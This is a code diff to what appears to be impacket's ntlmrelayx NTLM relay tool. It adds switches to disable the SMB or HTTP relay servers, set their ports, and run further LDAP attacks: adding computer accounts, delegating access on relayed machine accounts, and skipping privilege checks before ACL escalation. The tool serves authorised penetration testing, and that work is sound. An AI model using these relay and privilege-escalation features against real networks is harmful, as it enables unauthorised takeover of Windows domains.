@@ -47,7 +47,7 @@ from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig
 from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor, TargetsFileWatcher
 from impacket.examples.ntlmrelayx.servers.socksserver import SOCKS
 
-RELAY_SERVERS = ( SMBRelayServer, HTTPRelayServer )
+RELAY_SERVERS = []
 
 class MiniShell(cmd.Cmd):
     def __init__(self, relayConfig, threads):
@@ -86,7 +86,7 @@ class MiniShell(cmd.Cmd):
         return
 
     def do_socks(self, line):
-        headers = ["Protocol", "Target", "Username", "Port"]
+        headers = ["Protocol", "Target", "Username", "AdminStatus", "Port"]
         url = "http://localhost:9090/ntlmrelayx/api/v1.0/relays"
         try:
             proxy_handler = urllib2.ProxyHandler({})
@@ -123,6 +123,9 @@ class MiniShell(cmd.Cmd):
         print "Shutting down, please wait!"
         return True
 
+    def do_EOF(self, line):
+        return self.do_exit(line)
+
 def start_servers(options, threads):
     for server in RELAY_SERVERS:
         #Set up config
@@ -138,7 +141,7 @@ def start_servers(options, threads):
         c.setAttacks(PROTOCOL_ATTACKS)
         c.setLootdir(options.lootdir)
         c.setOutputFile(options.output_file)
-        c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.escalate_user)
+        c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access)
         c.setMSSQLOptions(options.query)
         c.setInteractive(options.interactive)
         c.setIMAPOptions(options.keyword, options.mailbox, options.all, options.imap_max)
@@ -148,6 +151,11 @@ def start_servers(options, threads):
         c.setInterfaceIp(options.interface_ip)
 
 
+        if server is HTTPRelayServer:
+            c.setListeningPort(options.http_port)
+        elif server is SMBRelayServer:
+            c.setListeningPort(options.smb_port)
+
         #If the redirect option is set, configure the HTTP server to redirect targets to SMB
         if server is HTTPRelayServer and options.r is not None:
             c.setMode('REDIRECT')
@@ -202,6 +210,13 @@ if __name__ == '__main__':
     parser.add_argument('-ip','--interface-ip', action='store', metavar='INTERFACE_IP', help='IP address of interface to '
                   'bind SMB and HTTP servers',default='')
 
+    serversoptions = parser.add_mutually_exclusive_group()
+    serversoptions.add_argument('--no-smb-server', action='store_true', help='Disables the SMB server')
+    serversoptions.add_argument('--no-http-server', action='store_true', help='Disables the HTTP server')
+
+    parser.add_argument('--smb-port', type=int, help='Port to listen on smb server', default=445)
+    parser.add_argument('--http-port', type=int, help='Port to listen on http server', default=80)
+
     parser.add_argument('-ra','--random', action='store_true', help='Randomize target selection (HTTP server only)')
     parser.add_argument('-r', action='store', metavar = 'SMBSERVER', help='Redirect HTTP requests to a file:// path on SMBSERVER')
     parser.add_argument('-l','--lootdir', action='store', type=str, required=False, metavar = 'LOOTDIR',default='.', help='Loot '
@@ -242,7 +257,10 @@ if __name__ == '__main__':
     ldapoptions.add_argument('--no-dump', action='store_false', required=False, help='Do not attempt to dump LDAP information')
     ldapoptions.add_argument('--no-da', action='store_false', required=False, help='Do not attempt to add a Domain Admin')
     ldapoptions.add_argument('--no-acl', action='store_false', required=False, help='Disable ACL attacks')
+    ldapoptions.add_argument('--no-validate-privs', action='store_false', required=False, help='Do not attempt to enumerate privileges, assume permissions are granted to escalate a user via ACL attacks')
     ldapoptions.add_argument('--escalate-user', action='store', required=False, help='Escalate privileges of this user instead of creating a new one')
+    ldapoptions.add_argument('--add-computer', action='store_true', required=False, help='Attempt to add a new computer account')
+    ldapoptions.add_argument('--delegate-access', action='store_true', required=False, help='Delegate access on relayed computer account to the specified account')
 
     #IMAP options
     imapoptions = parser.add_argument_group("IMAP client options")
@@ -292,8 +310,15 @@ if __name__ == '__main__':
             targetSystem = None
             mode = 'REFLECTION'
 
-    if options.r is not None:
-        logging.info("Running HTTP server in redirect mode")
+    if not options.no_smb_server:
+        RELAY_SERVERS.append(SMBRelayServer)
+
+    if not options.no_http_server:
+        RELAY_SERVERS.append(HTTPRelayServer)
+
+        if options.r is not None:
+            logging.info("Running HTTP server in redirect mode")
+
 
     if targetSystem is not None and options.w:
         watchthread = TargetsFileWatcher(targetSystem)
